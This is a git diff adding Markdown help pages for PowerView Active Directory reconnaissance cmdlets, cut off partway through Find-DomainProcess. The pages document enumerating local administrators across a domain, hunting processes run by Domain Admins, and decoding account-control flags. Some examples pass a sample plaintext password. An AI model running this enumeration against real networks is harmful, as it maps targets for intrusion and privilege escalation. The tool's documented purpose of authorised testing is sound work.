+## PARAMETERS
+
+### -ObjectSid
+Specifies one or more SIDs to convert.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: SID
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the translation, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to for the translation.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+Specifies an alternate credential to use for the translation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 4
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+Accepts one or more SID strings on the pipeline.
+
+## OUTPUTS
+
+### String
+
+The converted DOMAIN\username.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/ConvertFrom-UACValue.md b/docs/Recon/ConvertFrom-UACValue.md
new file mode 100755
index 0000000..c75f942
--- /dev/null
+++ b/docs/Recon/ConvertFrom-UACValue.md
@@ -0,0 +1,127 @@
+# ConvertFrom-UACValue
+
+## SYNOPSIS
+Converts a UAC int value to human readable form.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+ConvertFrom-UACValue [-Value] <Int32> [-ShowAll]
+```
+
+## DESCRIPTION
+This function will take an integer that represents a User Account
+Control (UAC) binary blob and will covert it to an ordered
+dictionary with each bitwise value broken out.
+By default only values
+set are displayed- the -ShowAll switch will display all values with
+a + next to the ones set.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+ConvertFrom-UACValue -Value 66176
+```
+
+Name Value
+---- -----
+ENCRYPTED_TEXT_PWD_ALLOWED 128
+NORMAL_ACCOUNT 512
+DONT_EXPIRE_PASSWORD 65536
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainUser harmj0y | ConvertFrom-UACValue
+```
+
+Name Value
+---- -----
+NORMAL_ACCOUNT 512
+DONT_EXPIRE_PASSWORD 65536
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainUser harmj0y | ConvertFrom-UACValue -ShowAll
+```
+
+Name Value
+---- -----
+SCRIPT 1
+ACCOUNTDISABLE 2
+HOMEDIR_REQUIRED 8
+LOCKOUT 16
+PASSWD_NOTREQD 32
+PASSWD_CANT_CHANGE 64
+ENCRYPTED_TEXT_PWD_ALLOWED 128
+TEMP_DUPLICATE_ACCOUNT 256
+NORMAL_ACCOUNT 512+
+INTERDOMAIN_TRUST_ACCOUNT 2048
+WORKSTATION_TRUST_ACCOUNT 4096
+SERVER_TRUST_ACCOUNT 8192
+DONT_EXPIRE_PASSWORD 65536+
+MNS_LOGON_ACCOUNT 131072
+SMARTCARD_REQUIRED 262144
+TRUSTED_FOR_DELEGATION 524288
+NOT_DELEGATED 1048576
+USE_DES_KEY_ONLY 2097152
+DONT_REQ_PREAUTH 4194304
+PASSWORD_EXPIRED 8388608
+TRUSTED_TO_AUTH_FOR_DELEGATION 16777216
+PARTIAL_SECRETS_ACCOUNT 67108864
+
+## PARAMETERS
+
+### -Value
+Specifies the integer UAC value to convert.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases: UAC, useraccountcontrol
+
+Required: True
+Position: 1
+Default value: 0
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ShowAll
+Switch.
+Signals ConvertFrom-UACValue to display all UAC values, with a + indicating the value is currently set.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### Int
+
+Accepts an integer representing a UAC binary blob.
+
+## OUTPUTS
+
+### System.Collections.Specialized.OrderedDictionary
+
+An ordered dictionary with the converted UAC fields.
+
+## NOTES
+
+## RELATED LINKS
+
+[https://support.microsoft.com/en-us/kb/305144](https://support.microsoft.com/en-us/kb/305144)
+
diff --git a/docs/Recon/ConvertTo-SID.md b/docs/Recon/ConvertTo-SID.md
new file mode 100755
index 0000000..71e9cea
--- /dev/null
+++ b/docs/Recon/ConvertTo-SID.md
@@ -0,0 +1,120 @@
+# ConvertTo-SID
+
+## SYNOPSIS
+Converts a given user/group name to a security identifier (SID).
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Convert-ADName, Get-DomainObject, Get-Domain
+
+## SYNTAX
+
+```
+ConvertTo-SID [-ObjectName] <String[]> [[-Domain] <String>] [[-Server] <String>] [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+Converts a "DOMAIN\username" syntax to a security identifier (SID)
+using System.Security.Principal.NTAccount's translate function.
+If alternate
+credentials are supplied, then Get-ADObject is used to try to map the name
+to a security identifier.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+ConvertTo-SID 'DEV\dfm'
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+'DEV\dfm','DEV\krbtgt' | ConvertTo-SID
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+'TESTLAB\dfm' | ConvertTo-SID -Credential $Cred
+
+## PARAMETERS
+
+### -ObjectName
+The user/group name to convert, can be 'user' or 'DOMAIN\user' format.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: Name, Identity
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the translation, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to for the translation.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+Specifies an alternate credential to use for the translation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 4
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+Accepts one or more username specification strings on the pipeline.
+
+## OUTPUTS
+
+### String
+
+A string representing the SID of the translated name.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Export-PowerViewCSV.md b/docs/Recon/Export-PowerViewCSV.md
new file mode 100755
index 0000000..1597249
--- /dev/null
+++ b/docs/Recon/Export-PowerViewCSV.md
@@ -0,0 +1,117 @@
+# Export-PowerViewCSV
+
+## SYNOPSIS
+Converts objects into a series of comma-separated (CSV) strings and saves the
+strings in a CSV file in a thread-safe manner.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Export-PowerViewCSV -InputObject <PSObject[]> [-Path] <String> [[-Delimiter] <Char>] [-Append]
+```
+
+## DESCRIPTION
+This helper exports an -InputObject to a .csv in a thread-safe manner
+using a mutex.
+This is so the various multi-threaded functions in
+PowerView has a thread-safe way to export output to the same file.
+Uses .NET IO.FileStream/IO.StreamWriter objects for speed.
+
+Originally based on Dmitry Sotnikov's Export-CSV code: http://poshcode.org/1590
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainUser | Export-PowerViewCSV -Path "users.csv"
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainUser | Export-PowerViewCSV -Path "users.csv" -Append -Delimiter '|'
+```
+
+## PARAMETERS
+
+### -InputObject
+Specifies the objects to export as CSV strings.
+
+```yaml
+Type: PSObject[]
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Path
+Specifies the path to the CSV output file.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delimiter
+Specifies a delimiter to separate the property values.
+The default is a comma (,)
+
+```yaml
+Type: Char
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 3
+Default value: ,
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Append
+Indicates that this cmdlet adds the CSV output to the end of the specified file.
+Without this parameter, Export-PowerViewCSV replaces the file contents without warning.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### PSObject
+
+Accepts one or more PSObjects on the pipeline.
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://poshcode.org/1590
+http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/](http://poshcode.org/1590
+http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/)
+
diff --git a/docs/Recon/Find-DomainLocalGroupMember.md b/docs/Recon/Find-DomainLocalGroupMember.md
new file mode 100755
index 0000000..be4055f
--- /dev/null
+++ b/docs/Recon/Find-DomainLocalGroupMember.md
@@ -0,0 +1,351 @@
+# Find-DomainLocalGroupMember
+
+## SYNOPSIS
+Enumerates the members of specified local group (default administrators)
+for all the targeted machines on the current (or specified) domain.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetLocalGroupMember, New-ThreadedFunction
+
+## SYNTAX
+
+```
+Find-DomainLocalGroupMember [[-ComputerName] <String[]>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]
+ [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-GroupName <String>] [-Method <String>]
+ [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
+ [-Credential <PSCredential>] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+## DESCRIPTION
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and enumerates the members of the specified local
+group (default of Administrators) for each machine using Get-NetLocalGroupMember.
+By default, the API method is used, but this can be modified with '-Method winnt'
+to use the WinNT service provider.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-DomainLocalGroupMember
+```
+
+Enumerates the local group memberships for all reachable machines in the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-DomainLocalGroupMember -Domain dev.testlab.local
+```
+
+Enumerates the local group memberships for all reachable machines the dev.testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-DomainLocalGroupMember -Domain testlab.local -Credential $Cred
+
+Enumerates the local group memberships for all reachable machines the dev.testlab.local
+domain using the alternate credentials.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DNSHostName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ComputerDomain
+Specifies the domain to query for computers, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerLDAPFilter
+Specifies an LDAP query string that is used to search for computer objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSearchBase
+Specifies the LDAP source to search through for computers,
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerOperatingSystem
+Search computers with a specific operating system, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: OperatingSystem
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerServicePack
+Search computers with a specific service pack, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServicePack
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSiteName
+Search computers in the specific AD Site name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: SiteName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -GroupName
+The local group name to query for users.
+If not given, it defaults to "Administrators".
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Administrators
+Accept pipeline input: True (ByPropertyName)
+Accept wildcard characters: False
+```
+
+### -Method
+The collection method to use, defaults to 'API', also accepts 'WinNT'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: CollectionMethod
+
+Required: False
+Position: Named
+Default value: API
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain and target systems.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delay
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Jitter
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
+
+```yaml
+Type: Double
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0.3
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+The number of threads to use for user searching, defaults to 20.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 20
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.LocalGroupMember.API
+
+Custom PSObject with translated group property fields from API results.
+
+PowerView.LocalGroupMember.WinNT
+
+Custom PSObject with translated group property fields from WinNT results.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Find-DomainObjectPropertyOutlier.md b/docs/Recon/Find-DomainObjectPropertyOutlier.md
new file mode 100755
index 0000000..280e8ef
--- /dev/null
+++ b/docs/Recon/Find-DomainObjectPropertyOutlier.md
@@ -0,0 +1,261 @@
+# Find-DomainObjectPropertyOutlier
+
+## SYNOPSIS
+Finds user/group/computer objects in AD that have 'outlier' properties set.
+
+Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: Get-Domain, Get-DomainUser, Get-DomainGroup, Get-DomainComputer, Get-ForestSchemaClass
+
+## SYNTAX
+
+### ClassName (Default)
+```
+Find-DomainObjectPropertyOutlier [-ClassName] <String> [-ReferencePropertySet <String[]>] [-Domain <String>]
+ [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+### ReferenceObject
+```
+Find-DomainObjectPropertyOutlier [-ReferencePropertySet <String[]>] -ReferenceObject <PSObject>
+ [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Enumerates the schema for the specified -ClassName (if passed) by using Get-ForestSchemaClass.
+If a -ReferenceObject is passed, the class is extracted from the passed object.
+A 'reference' set of property names is then calculated, either from a standard set preserved
+for user/group/computers, or from the array of names passed to -ReferencePropertySet, or
+from the property names of the passed -ReferenceObject.
+These property names are substracted
+from the master schema propertyu name list to retrieve a set of 'non-standard' properties.
+Every user/group/computer object (depending on determined class) are enumerated, and for each
+object, if the object has a 'non-standard' property set, the object samAccountName, property
+name, and property value are output to the pipeline.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-DomainObjectPropertyOutlier -User
+```
+
+Enumerates users in the current domain with 'outlier' properties filled in.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-DomainObjectPropertyOutlier -Group -Domain external.local
+```
+
+Enumerates groups in the external.local forest/domain with 'outlier' properties filled in.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier
+```
+
+Enumerates computers in the current domain with 'outlier' properties filled in.
+
+## PARAMETERS
+
+### -ClassName
+Specifies the AD object class to find property outliers for, 'user', 'group', or 'computer'.
+If -ReferenceObject is specified, this will be automatically extracted, if possible.
+
+```yaml
+Type: String
+Parameter Sets: ClassName
+Aliases: Class
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ReferencePropertySet
+Specifies an array of property names to diff against the class schema.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ReferenceObject
+Specicifes the PowerView user/group/computer object to extract property names
+from to use as the reference set.
+
+```yaml
+Type: PSObject
+Parameter Sets: ReferenceObject
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.PropertyOutlier
+
+Custom PSObject with translated object property outliers.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Find-DomainProcess.md b/docs/Recon/Find-DomainProcess.md
new file mode 100755
index 0000000..89dc568
--- /dev/null
+++ b/docs/Recon/Find-DomainProcess.md
@@ -0,0 +1,517 @@
+# Find-DomainProcess
+
+## SYNOPSIS
+Searches for processes on the domain using WMI, returning processes
+that match a particular user specification or process name.
+
+Thanks to @paulbrandau for the approach idea.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Get-WMIProcess, New-ThreadedFunction
+
+## SYNTAX
+
+### None (Default)
+```
+Find-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
+ [-UserGroupIdentity <String[]>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>]
+ [-Jitter <Double>] [-Threads <Int32>]
+```
+
+### TargetProcess
+```
+Find-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
+ [-ProcessName <String[]>] [-UserGroupIdentity <String[]>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+### UserIdentity
+```
+Find-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
+ [-UserIdentity <String[]>] [-UserGroupIdentity <String[]>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+### TargetUser
+```
+Find-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
+ [-UserIdentity <String[]>] [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>]
+ [-UserGroupIdentity <String[]>] [-UserAdminCount] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+## DESCRIPTION
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and queries the domain for users of a specified group
+(default 'Domain Admins') with Get-DomainGroupMember.
+Then for each server the
+function enumerates any current processes running with Get-WMIProcess,
+searching for processes running under any target user contexts or with the
+specified -ProcessName.
+If -Credential is passed, it is passed through to
+the underlying WMI commands used to enumerate the remote machines.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-DomainProcess
+```
+
+Searches for processes run by 'Domain Admins' by enumerating every computer in the domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-DomainProcess -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local
+```
+
+Enumerates Windows 7 computers in dev.testlab.local and returns any processes being run by
+privileged users in dev.testlab.local.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Find-DomainProcess -ProcessName putty.exe
+```
+
+Searchings for instances of putty.exe running on the current domain.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-DomainProcess -Domain testlab.local -Credential $Cred
+
+Searches processes being run by 'domain admins' in the testlab.local using the specified alternate credentials.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DNSHostName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to query for computers AND users, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerDomain
+Specifies the domain to query for computers, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerLDAPFilter
+Specifies an LDAP query string that is used to search for computer objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSearchBase
+Specifies the LDAP source to search through for computers,
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerUnconstrained
+Switch.
+Search computer objects that have unconstrained delegation.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: Unconstrained
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerOperatingSystem
+Search computers with a specific operating system, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: OperatingSystem
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerServicePack
+Search computers with a specific service pack, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServicePack
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSiteName
+Search computers in the specific AD Site name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: SiteName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
